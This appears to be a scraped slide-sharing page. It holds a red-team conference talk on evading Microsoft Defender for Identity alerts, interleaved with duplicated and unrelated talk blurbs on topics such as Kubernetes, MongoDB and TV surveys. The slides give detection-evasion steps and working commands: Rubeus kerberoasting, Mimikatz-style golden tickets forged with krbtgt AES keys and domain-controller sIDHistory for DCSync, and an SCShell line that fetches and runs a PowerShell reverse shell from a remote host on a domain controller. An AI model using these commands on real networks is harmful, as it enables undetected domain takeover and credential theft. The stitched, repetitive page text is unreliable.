This document discusses bypassing alerts from Microsoft Defender for Identity (MDI). It begins with an introduction to MDI and the types of alerts it generates. It then explores techniques for bypassing alerts during different phases of an attack like reconnaissance, credential compromise, and lateral movement. These include using alternative tools, limiting interactions with domain controllers, and complying with Kerberos policies. The document also notes techniques like silver tickets that are not detected by MDI. It concludes by acknowledging limitations of only testing alerts and not coupled defenses.
Here Be Dragons: The Unexplored Land of Active Directory ACLsAndy Robbins
Presented by Andy Robbins, Rohan Vazarkar, and Will Schroeder at DerbyCon 7.0: Legacy, in Louisville, Kentucky, 2017.
See the video recording of the presentation here: https://www.youtube.com/watch?v=mfaFuXEiLF4
Evading Microsoft ATA for Active Directory DominationNikhil Mittal
The talk I gave at Black Hat USA 2017 on bypassing Microsoft Advanced Threat Analytics (ATA). I demonstrate techniques to bypass, avoid and attack ATA in this talk.
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
Talk of Skip Duckwall and I at BlackHat 2014 USA / Defcon Wall of Sheep.
Kerberos, and new pass-the-* feature, like overpass-the-hash and the Golden Ticket
This presentation was given at BSides Austin '15, and is an expanded version of the "I hunt sys admins" Shmoocon firetalk. It covers various ways to hunt for users in Windows domains, including using PowerView.
Here Be Dragons: The Unexplored Land of Active Directory ACLsAndy Robbins
Presented by Andy Robbins, Rohan Vazarkar, and Will Schroeder at DerbyCon 7.0: Legacy, in Louisville, Kentucky, 2017.
See the video recording of the presentation here: https://www.youtube.com/watch?v=mfaFuXEiLF4
Evading Microsoft ATA for Active Directory DominationNikhil Mittal
The talk I gave at Black Hat USA 2017 on bypassing Microsoft Advanced Threat Analytics (ATA). I demonstrate techniques to bypass, avoid and attack ATA in this talk.
Abusing Microsoft Kerberos - Sorry you guys don't get itBenjamin Delpy
Talk of Skip Duckwall and I at BlackHat 2014 USA / Defcon Wall of Sheep.
Kerberos, and new pass-the-* feature, like overpass-the-hash and the Golden Ticket
This presentation was given at BSides Austin '15, and is an expanded version of the "I hunt sys admins" Shmoocon firetalk. It covers various ways to hunt for users in Windows domains, including using PowerView.
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
Azure AD is everything but a domain controller in the cloud. This talk will cover what Azure AD is, how it is commonly integrated with Active Directory and how security boundaries extend into the cloud, covering sync account password recovery, privilege escalations in Azure AD and full admin account takeovers using limited on-premise privileges.
While Active Directory has been researched for years and the security boundaries and risks are generally well documented, more and more organizations are extending their network into the cloud. A prime example of this is Office 365, which Microsoft offers through their Azure cloud. Connecting the on-premise Active Directory with the cloud introduces new attack surface both for the cloud and the on-premise directory.
This talk looks at the way the trust between Active Directory and Azure is set up and can be abused through the Azure AD Connect tool. We will take a dive into how the synchronization is set up, how the high-privilege credentials for both the cloud and Active Directory are protected (and can be obtained) and what permissions are associated with these accounts.
The talk will outline how a zero day in common setups was discovered through which on-premise users with limited privileges could take over the highest administration account in Azure and potentially compromise all cloud assets.
We will also take a look at the Azure AD architecture and common roles, and how attackers could backdoor or escalate privileges in cloud setups.
Lastly we will look at how to prevent against these kind of attacks and why your AD Connect server is perhaps one of the most critical assets in the on-premise infrastructure.
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItNikhil Mittal
The talk I gave at Black Hat USA 2016 on Anti Malware Scan Interface. The talk looks at what good AMSI brings to Windows 10 and various methods of avoiding/bypassing it.
Identifying privilege escalation paths within an Active Directory environment is crucial for a successful red team. Over the last few years, BloodHound has made it easier for red teamers to perform reconnaissance activities and identify these attacks paths. When evaluating BloodHound data, it is common to find ourselves having sufficient rights to modify a Group Policy Object (GPO). This level of access allows us to perform a number of attacks, targeting any computer or user object controlled by the vulnerable GPO.
In this talk we will present previous research related to GPO abuses and share a number of misconfigurations we have found in the wild. We will also present a tool that allows red teamers to target users and computers controlled by a vulnerable GPO in order to escalate privileges and move laterally within the environment.
My slides for PHDays 2018 Threat Hunting Hands-On Lab - https://www.phdays.com/en/program/reports/build-your-own-threat-hunting-based-on-open-source-tools/
Virtual Machines for lab are available here - https://yadi.sk/d/qB1PNBj_3ViWHe
How to Hunt for Lateral Movement on Your NetworkSqrrl
Once inside your network, most cyber-attacks go sideways. They progressively move deeper into the network, laterally compromising other systems as they search for key assets and data. Would you spot this lateral movement on your enterprise network?
In this training session, we review the various techniques attackers use to spread through a network, which data sets you can use to reliably find them, and how data science techniques can be used to help automate the detection of lateral movement.
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Shakacon
While Kerberos "Golden Tickets" and "Silver Tickets" received a lot of press in the second half of 2014, there hasn't been much detail provided on how exactly they work, why they are successful, and how to mitigate them (other than: "don't get pwned"). Golden Tickets are the ultimate method for persistent, forever AD admin rights to a network since they are valid Kerberos tickets and can't be detected, right?
This talk covers the latest Active Directory attack vectors and describes how to detect Golden Ticket usage. Provided are key indicators that can detect Kerberos attacks on your network, including Golden tickets, Silver tickets & MS14-068 exploitation, as well as methods to identify, mitigate, and prevent common Active Directory attack vectors. When forged Kerberos tickets are used in AD, there are some interesting artifacts that can be identified. Yes, despite what you may have read on the internet, there are ways to detect Golden & Silver Ticket usage!
Some of the topics covered:
How attackers go from zero to (Domain) Admin
MS14-068: the vulnerability, the exploit, and the danger
"SPN Scanning" with PowerShell to identify potential targets without network scans (SQL, Exchange, FIM, webservers, etc.)
Exploiting weak service account passwords as a regular AD user
Mimikatz, the attacker's multi-tool
Using Silver Tickets for stealthy persistence that won’t be detected (until now)
Identifying forged Kerberos tickets (Golden & Silver Tickets) on your network
Detecting offensive PowerShell tools like Invoke-Mimikatz
Active Directory attack mitigation
Kerberos expertise is not required since the presentation covers how Active Directory leverages Kerberos for authentication identifying the areas useful for attack. Information presented is useful for both Red Team & Blue Team members as well as AD administrators.
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...DirkjanMollema
Azure AD is everything but a domain controller in the cloud. This talk will cover what Azure AD is, how it is commonly integrated with Active Directory and how security boundaries extend into the cloud, covering sync account password recovery, privilege escalations in Azure AD and full admin account takeovers using limited on-premise privileges.
While Active Directory has been researched for years and the security boundaries and risks are generally well documented, more and more organizations are extending their network into the cloud. A prime example of this is Office 365, which Microsoft offers through their Azure cloud. Connecting the on-premise Active Directory with the cloud introduces new attack surface both for the cloud and the on-premise directory.
This talk looks at the way the trust between Active Directory and Azure is set up and can be abused through the Azure AD Connect tool. We will take a dive into how the synchronization is set up, how the high-privilege credentials for both the cloud and Active Directory are protected (and can be obtained) and what permissions are associated with these accounts.
The talk will outline how a zero day in common setups was discovered through which on-premise users with limited privileges could take over the highest administration account in Azure and potentially compromise all cloud assets.
We will also take a look at the Azure AD architecture and common roles, and how attackers could backdoor or escalate privileges in cloud setups.
Lastly we will look at how to prevent against these kind of attacks and why your AD Connect server is perhaps one of the most critical assets in the on-premise infrastructure.
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItNikhil Mittal
The talk I gave at Black Hat USA 2016 on Anti Malware Scan Interface. The talk looks at what good AMSI brings to Windows 10 and various methods of avoiding/bypassing it.
Identifying privilege escalation paths within an Active Directory environment is crucial for a successful red team. Over the last few years, BloodHound has made it easier for red teamers to perform reconnaissance activities and identify these attacks paths. When evaluating BloodHound data, it is common to find ourselves having sufficient rights to modify a Group Policy Object (GPO). This level of access allows us to perform a number of attacks, targeting any computer or user object controlled by the vulnerable GPO.
In this talk we will present previous research related to GPO abuses and share a number of misconfigurations we have found in the wild. We will also present a tool that allows red teamers to target users and computers controlled by a vulnerable GPO in order to escalate privileges and move laterally within the environment.
My slides for PHDays 2018 Threat Hunting Hands-On Lab - https://www.phdays.com/en/program/reports/build-your-own-threat-hunting-based-on-open-source-tools/
Virtual Machines for lab are available here - https://yadi.sk/d/qB1PNBj_3ViWHe
How to Hunt for Lateral Movement on Your NetworkSqrrl
Once inside your network, most cyber-attacks go sideways. They progressively move deeper into the network, laterally compromising other systems as they search for key assets and data. Would you spot this lateral movement on your enterprise network?
In this training session, we review the various techniques attackers use to spread through a network, which data sets you can use to reliably find them, and how data science techniques can be used to help automate the detection of lateral movement.
Red vs Blue- Modern Atice Directory Attacks, Detection & Protection by Sean M...Shakacon
While Kerberos "Golden Tickets" and "Silver Tickets" received a lot of press in the second half of 2014, there hasn't been much detail provided on how exactly they work, why they are successful, and how to mitigate them (other than: "don't get pwned"). Golden Tickets are the ultimate method for persistent, forever AD admin rights to a network since they are valid Kerberos tickets and can't be detected, right?
This talk covers the latest Active Directory attack vectors and describes how to detect Golden Ticket usage. Provided are key indicators that can detect Kerberos attacks on your network, including Golden tickets, Silver tickets & MS14-068 exploitation, as well as methods to identify, mitigate, and prevent common Active Directory attack vectors. When forged Kerberos tickets are used in AD, there are some interesting artifacts that can be identified. Yes, despite what you may have read on the internet, there are ways to detect Golden & Silver Ticket usage!
Some of the topics covered:
How attackers go from zero to (Domain) Admin
MS14-068: the vulnerability, the exploit, and the danger
"SPN Scanning" with PowerShell to identify potential targets without network scans (SQL, Exchange, FIM, webservers, etc.)
Exploiting weak service account passwords as a regular AD user
Mimikatz, the attacker's multi-tool
Using Silver Tickets for stealthy persistence that won’t be detected (until now)
Identifying forged Kerberos tickets (Golden & Silver Tickets) on your network
Detecting offensive PowerShell tools like Invoke-Mimikatz
Active Directory attack mitigation
Kerberos expertise is not required since the presentation covers how Active Directory leverages Kerberos for authentication identifying the areas useful for attack. Information presented is useful for both Red Team & Blue Team members as well as AD administrators.
InSecure Remote Operations - NullCon 2023 by Yossi SassiYossi Sassi
Every admin tool is an attack tool, yet there are no good or bad shells - that part is up to you. Coming from dozens of engagements consulting various role-based remote operations architectures & Red Team assessments for organizations in 4 continents, with a fresh research hijacking full tokens from network logon-type sessions - we’ll dive into a technical, hands-on set of examples for both Offensive and Defensive teams, of what SUCKS and what ROCKS on the Windows ‘Living off the land’ remote admin operations, Protocols, and APIs. We'll talk about the Pros and Cons of jump server architectures, as well as role-based shells, limiting PowerShell in creative ways. We'll also introduce fresh research to achieve Full Token hijack from network logon-type sessions, without any hash and/or TGT!
How to Secure Your Scylla Deployment: Authorization, Encryption, LDAP Authent...ScyllaDB
Scylla includes multiple features that collectively provide a robust security model. Most recently we announced support for encryption-at-rest in Scylla Enterprise. This enables you to lock-down your data even in multi-tenant and hybrid deployments of Scylla. Join Tzach and Dejan for an overview of security in Scylla and to see how you can approach it holistically using the array of Scylla capabilities. He will review Scylla Security features, from basic to more advanced, including:
Reducing your attack surface
Authorization & Authentication
Role-Based Access Control
Encryption at Transit
Encryption at Rest, in 2019.1.1 and beyond
LDAP authentication is a common requirement for any enterprise software. It gives users consistent login procedures across multiple components of the IT infrastructure, while centralizing the control of access rights. Scylla Enterprise now supports authentication via LDAP. We will look into how to configure Scylla Enterprise for LDAP interaction and how to fine-tune access control through it.
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureMongoDB
Your MongoDB Community Edition database can probably be a lot more secure than it is today, since Community Edition provides a wide range of capabilities for securing your system, and you are probably not using them all. If you are worried about cyber-threats, take action reduce your anxiety!
MongoDB .local Bengaluru 2019: New Encryption Capabilities in MongoDB 4.2: A ...MongoDB
Many applications with high-sensitivity workloads require enhanced technical options to control and limit access to confidential and regulated data. In some cases, system requirements or compliance obligations dictate a separation of duties for staff operating the database and those who maintain the application layer. In cloud-hosted environments, certain data are sometimes deemed too sensitive to store on third-party infrastructure. This is a common pain for system architects in the healthcare, finance, and consumer tech sectors — the benefits of managed, easily expanded compute and storage have been considered unavailable because of data confidentiality and privacy concerns.
This session will take a deep dive into new security capabilities in MongoDB 4.2 that address these scenarios, by enabling native client-side field-level encryption, using customer-managed keys. We will review how confidential data can be securely stored and easily accessed by applications running on MongoDB. Common query design patterns will be presented, with example code demonstrating strong end-to-end encryption in Atlas or on-premise. Implications for developers and others designing systems in regulated environments will be discussed, followed by a Q&A with senior MongoDB security engineers.
[errata] For more information on DCSync and associated permissions, as well as AdminSDHolder and associated permissions, see Sean Metcalf's respective posts at https://adsecurity.org/?p=1729 and https://adsecurity.org/?p=1906 .
"An ACE Up the Sleeve: Designing Active Directory DACL Backdoors" was presented at BlackHat and DEF CON 2017.
XP Days 2019: First secret delivery for modern cloud-native applicationsVlad Fedosov
In this talk we’ll see how Authentication and Secrets delivery work in distributed containerized applications from the inside. We’ll start from the theory of security and will go through the topics like Container Auth Role, Static & Dynamic secrets, Env vars/volumes for secret delivery, Vault & K8S secrets. After this talk you’ll get an understanding how to securely deploy your containerized workloads.
Tips on Securing Drupal Sites - DrupalCamp Atlanta (DCA)cgmonroe
This is an updated version of this talk given at DrupalCamp Atlanta (DCA)
This presentation is an overview / case study of things learned by experiencing GDPR Security audits, DoS attacks, brute force login attacks, annoying robot crawlers, and hackers doing security probes.
The session will cover the following main topics with tips on how to protected against each of these.
An overview of security threats
Server Level Attacks
Code Level Attacks
User Access Attacks
Internal Attacks
Some suggestions on developing a security plan
People attending should come away with useful knowledge (modules, best practices, sites that help, front end tools and the like) that will help secure their sites.
Achieving compliance With MongoDB Security Mydbops
Achieving PCI, HIPPA, and GDPR compliance are interesting challenges that MongoDB DBAs encounter throughout all firms, am I right?
Available MongoDB Security features such as authentication, access control, and encryption, to secure your MongoDB deployments with Opensource choices.
Delve Labs was present during the GoSec 2016 conference, where our lead DevOps engineer presented an overview of the current options available for securing Docker in production environments.
https://www.delve-labs.com
Continuous intrusion: Why CI tools are an attacker’s best friendsNikhil Mittal
Slides of the talk I gave at BlackHat Europe and DeepSec 2015. Continuous Integration (CI) tools provide an excellent attack surface due to the no/poor security controls, distributed build management capability, and level of access/privileges in an enterprise.
This talk looks at the CI tools from an attacker's perspective and to use them as portals for getting a foothold and lateral movement. We will see how to execute attacks like command and script execution, credentials stealing, privilege escalation to not only compromise the build process but the underlying operating system and even entire Windows domains. No memory corruption bugs will be exploited and only the features of the CI tools will be used.
This presentation done at DeepSec 2014 focuses on using PowerShell for Client Side attacks. New scripts which are part of the open-source toolkit Nishang were also released. NIshang is toolkit in PowerShell for Penetration Testing
This was a workshop I conducted at Black Hat Europe'12. The workshop explains how to program a USB HID, Teensy++ in this case, for usage in offensive security.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualityInflectra
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
Accelerate your Kubernetes clusters with Varnish CachingThijs Feryn
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf91mobiles
91mobiles recently conducted a Smart TV Buyer Insights Survey in which we asked over 3,000 respondents about the TV they own, aspects they look at on a new TV, and their TV buying preferences.
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...James Anderson
Effective Application Security in Software Delivery lifecycle using Deployment Firewall and DBOM
The modern software delivery process (or the CI/CD process) includes many tools, distributed teams, open-source code, and cloud platforms. Constant focus on speed to release software to market, along with the traditional slow and manual security checks has caused gaps in continuous security as an important piece in the software supply chain. Today organizations feel more susceptible to external and internal cyber threats due to the vast attack surface in their applications supply chain and the lack of end-to-end governance and risk management.
The software team must secure its software delivery process to avoid vulnerability and security breaches. This needs to be achieved with existing tool chains and without extensive rework of the delivery processes. This talk will present strategies and techniques for providing visibility into the true risk of the existing vulnerabilities, preventing the introduction of security issues in the software, resolving vulnerabilities in production environments quickly, and capturing the deployment bill of materials (DBOM).
Speakers:
Bob Boule
Robert Boule is a technology enthusiast with PASSION for technology and making things work along with a knack for helping others understand how things work. He comes with around 20 years of solution engineering experience in application security, software continuous delivery, and SaaS platforms. He is known for his dynamic presentations in CI/CD and application security integrated in software delivery lifecycle.
Gopinath Rebala
Gopinath Rebala is the CTO of OpsMx, where he has overall responsibility for the machine learning and data processing architectures for Secure Software Delivery. Gopi also has a strong connection with our customers, leading design and architecture for strategic implementations. Gopi is a frequent speaker and well-known leader in continuous delivery and integrating security into software delivery.
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Tobias Schneck
As AI technology is pushing into IT I was wondering myself, as an “infrastructure container kubernetes guy”, how get this fancy AI technology get managed from an infrastructure operational view? Is it possible to apply our lovely cloud native principals as well? What benefit’s both technologies could bring to each other?
Let me take this questions and provide you a short journey through existing deployment models and use cases for AI software. On practical examples, we discuss what cloud/on-premise strategy we may need for applying it to our own infrastructure to get it to work from an enterprise perspective. I want to give an overview about infrastructure requirements and technologies, what could be beneficial or limiting your AI use cases in an enterprise environment. An interactive Demo will give you some insides, what approaches I got already working for real.
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Ramesh Iyer
In today's fast-changing business world, Companies that adapt and embrace new ideas often need help to keep up with the competition. However, fostering a culture of innovation takes much work. It takes vision, leadership and willingness to take risks in the right proportion. Sachin Dev Duggal, co-founder of Builder.ai, has perfected the art of this balance, creating a company culture where creativity and growth are nurtured at each stage.
2. 0wn Premises: Bypassing MDI
AlteredSecurity
About me
◎ Twitter - @nikhil_mitt
◎ Founder of Altered Security - alteredsecurity.com
◎ GitHub - github.com/samratashok/
◎ Creator of Nishang, Deploy-Deception, RACE toolkit and
more
◎ Interested in Active Directory and Azure security
◎ Previous Talks and/or Trainings
○ DEF CON, BlackHat, BruCON and more.
2
3. 0wn Premises: Bypassing MDI
AlteredSecurity
Agenda
◎ Introduction to MDI
◎ Alerts
◎ Bypassing existing Alerts
◎ Techniques that are not detected (no alerts)
◎ Abusing MDI Response Action
◎ Limitations of the research
3
4. 0wn Premises: Bypassing MDI
AlteredSecurity
Microsoft Defender for Identity (MDI)
◎ Analyzes traffic and logs on domain controllers, builds
profiles for identities and then look for anomalies –
deviation from “normal” behavior.
4
6. 0wn Premises: Bypassing MDI
AlteredSecurity
Bypassing MDI
◎ MDI targets careless attackers!
○ Endpoint opsec is NOT the only opsec
○ Know your tools! Understand how they interact with DCs
○ Always assume that DCs are heavily monitored – Limit your interaction
with DCs!
6
7. 0wn Premises: Bypassing MDI
AlteredSecurity
Bypassing MDI
◎ Question your TTPs and activity
○ Does traffic generated by my activity mix well with the existing traffic?
○ Am I using RC4 in place of AES?
○ Are my LDAP queries too specific?
○ Would the logs look similar to legit ones?
○ Are my Kerberos tickets compliant to Kerberos policy? Do my forged
tickets stand out?
○ How could I be more silent?
7
8. 0wn Premises: Bypassing MDI
AlteredSecurity
Bypass – Recon alerts
8
Alert Triggered by Bypass
Active Directory attributes
reconnaissance (LDAP)
Enumeration for RBCD, ‘Don’t
require preauth’ with LDAP
Filtering
Request all attributes and filter
offline. Avoid LDAP Filtering
User and Group membership
reconnaissance (SAMR)
Tools like net.exe Don’t use net.exe for enum :)
User and IP address
reconnaissance (SMB)
NetSessionEnum against the DC Avoid doing SMB Session
enumeration against DC
10. 0wn Premises: Bypassing MDI
AlteredSecurity
Bypass – Compromised Credentials
10
Alert Triggered by Bypass
Honeytoken activity Use of account marked as
Honeytoken account
Look for user account attributes
like logonCount and
badPwdCount to find
honeytoken accounts
Suspected Kerberos SPN
Exposure
Requesting TGS tickets for
multiple SPNs e.g. “Rubeus
kerberoast”
Enumerate accounts (request
all attributes and filter offline)
with SPN and request one TGS
ticket at a time
Suspected AS-REP Roasting
attack
Requesting AS-REPs for
multiple users e.g. “Rubeus
asreproast”
Enumeration of users with
Preauth disabled
Enumerate accounts (request
all attributes and filter offline)
with preauth disabled and
request one AS-REP at a time
11. 0wn Premises: Bypassing MDI
AlteredSecurity
Bypass – Compromised Credentials
Suspected Kerberos SPN Exposure
◎ Enumerate using PowerView or ADModule and request one TGS ticket at a
time
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties
ServicePrincipalName
Rubeus.exe kerberoast /user:targetaccount /simple /rc4opsec
11
13. 0wn Premises: Bypassing MDI
AlteredSecurity
Bypass – Lateral Movement
13
Alert Triggered by Bypass
Suspected identity theft
(pass- the-ticket)
Reuse of TGT from more than
one machine
Was NOT very reliably triggered
during testing
Suspected overpass-the-
hash attack (Kerberos)
No previous logon on a
machine
Could not bypass alert for ‘no
previous logon’
No more encryption downgrade
alert on use of RC4/NTLM hash but
still use AES keys
Suspected rogue Kerberos
certificate usage
No previous use of certificate
on a machine
Was NOT very reliably triggered
during testing
14. 0wn Premises: Bypassing MDI
AlteredSecurity
Bypass – Domain Dominance
14
Alert Triggered by Bypass
Remote code execution attempt Use of PSExec, Remote WMI, WinRM
(PSRemoting) and service creation
Code execution by modifying existing
service (tools like SCShell)
Suspected DCSync attack Replication request from a machine
that is not a DC
Use DC machine account, TGT or
sIDHistory
Principals that have replication rights
like DCs, Enterprise DCs, Azure AD
Connect, Sharepoint admins etc.
Suspected Golden Ticket usage
(encryption downgrade)
Use of NTLM hash (RC4) of the krbtgt
account
Use AES256 or AES 128 key of the
krbtgt account
Suspected Golden Ticket usage
(nonexistent account)
Forging TGT for a nonexistent
account
Always use a valid and active DA
account
Suspected Golden Ticket usage (time
anomaly)
Use of TGT for longer than the value
specified in Kerberos Policy
Enumerate the Kerberos Policy and
make sure the forged ticket complies
with settings
15. 0wn Premises: Bypassing MDI
AlteredSecurity
Bypass – Domain Dominance
Remote Code Execution Attempt
◎ Using AES keys for Overpass-the-hash and using SCShell
(https://github.com/Mr-Un1k0d3r/SCShell) for modifying an existing service
◎ SCShell.exe dcorp-dc XblAuthManager "C:WindowsSystem32cmd.exe /c
powershell iex (iwr -UseBasicParsing http://<IP>/Invoke-
PowerShellTcp.ps1)“
Note that .NET assembly loader in place of PowerShell work just fine too!
15
17. 0wn Premises: Bypassing MDI
AlteredSecurity
Bypass – Domain Dominance
Suspected DCSync Attack
◎ Use Principals that have replication rights - Domain Controllers and
Enterprise Domain Controllers groups always have replication rights!
◎ Run DCSync using credentials/Silver ticket/TGT of DC or having sIDHistory
of Domain Controllers or Enterprise Domain Controllers to avoid
detection.
17
18. 0wn Premises: Bypassing MDI
AlteredSecurity
Bypass – Domain Dominance
Suspected DCSync Attack
◎ Silver ticket using DC machine account
○ Need NTLM hash/AES keys of the DC. Usually, after getting DA privileges
◎ TGT of DC machine account
○ Abusing unconstrained delegation with coercion
◎ sIDHistory of DC - Forging a TGT with sIDHistory of DCs and Enterprise DCs
Safetykatz.exe '"kerberos::golden /user:dc$ /domain: /sid: /groups:516
/sids:ForestRootSID-516,S-1-5-9 /krbtgt: /ptt“’
◎ Find other prinicpals that have replication rights using PowerView
Get-DomainObjectAcl -SearchBase "DC=dollarcorp,DC=moneycorp,DC=local" -SearchScope Base
-ResolveGUIDs | ?{($_.ObjectAceType -match 'replication-get')} | ForEach-Object {$_ |
Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}
18
20. 0wn Premises: Bypassing MDI
AlteredSecurity
Bypass – Domain Dominance
Suspected Golden Ticket usage (encryption downgrade)/(nonexistent
account)/(time anomaly)
◎ MDI or not, it always makes sense to:
○ Enumerate the Kerberos Policy in the target environment
○ Use AES keys of krbtgt account
○ Use an existing and active target account
20
21. 0wn Premises: Bypassing MDI
AlteredSecurity
Bypass – Domain Dominance
Suspected Golden Ticket usage (encryption downgrade)/(nonexistent
account)/(time anomaly)
◎ Look at logonCount and badPwdCount of a user
◎ Check the Kerberos Policy – Default is TGT lifetime of 10 hours and
Renewal time of 7 days
SafetyKatz.exe "kerberos::golden /User:Administrator /domain: /sid:
/aes256:AES_of_krbtgt /startoffset:0 /endin:600 /renewmax:10080
/ptt" "exit"
21
23. 0wn Premises: Bypassing MDI
AlteredSecurity
Techniques that are not detected (no alerts)
◎ Diamond Ticket
◎ Silver Ticket
◎ Delegation configuration
◎ UserAccountControl changes like setting SPN, disabling PreAuth etc.
◎ Changes to AdminSDHolder
◎ New SSPs
◎ Addition of Replication Rights
◎ Many of these are known since the time of Microsoft ATA -
https://www.slideshare.net/nikhil_mittal/evading-microsoft-ata-for-active-directory-domination
23
24. 0wn Premises: Bypassing MDI
AlteredSecurity
Abusing MDI Response Action
◎ A user with Security Administrator role can reset password of a user that has a path to domain
admin.
◎ In case of Hybrid Identity, DA compromise may lead to Global Administrator compromise!
◎ https://techcommunity.microsoft.com/t5/security-compliance-and-identity/microsoft-defender-for-identity-response-actions/ba-p/3271716
24
25. 0wn Premises: Bypassing MDI
AlteredSecurity
Limitations of the research
◎ Only alerts related to functionality abuse are tested.
◎ Noisy attacks (brute-force or patched vulnerabilities) are
not tested.
◎ No testing for ADFS.
◎ Majority of testing done in a lab environment. Only a couple
of production environments tested.
◎ Coupling up MDI with other security solutions would
produce better results in terms of detection.
25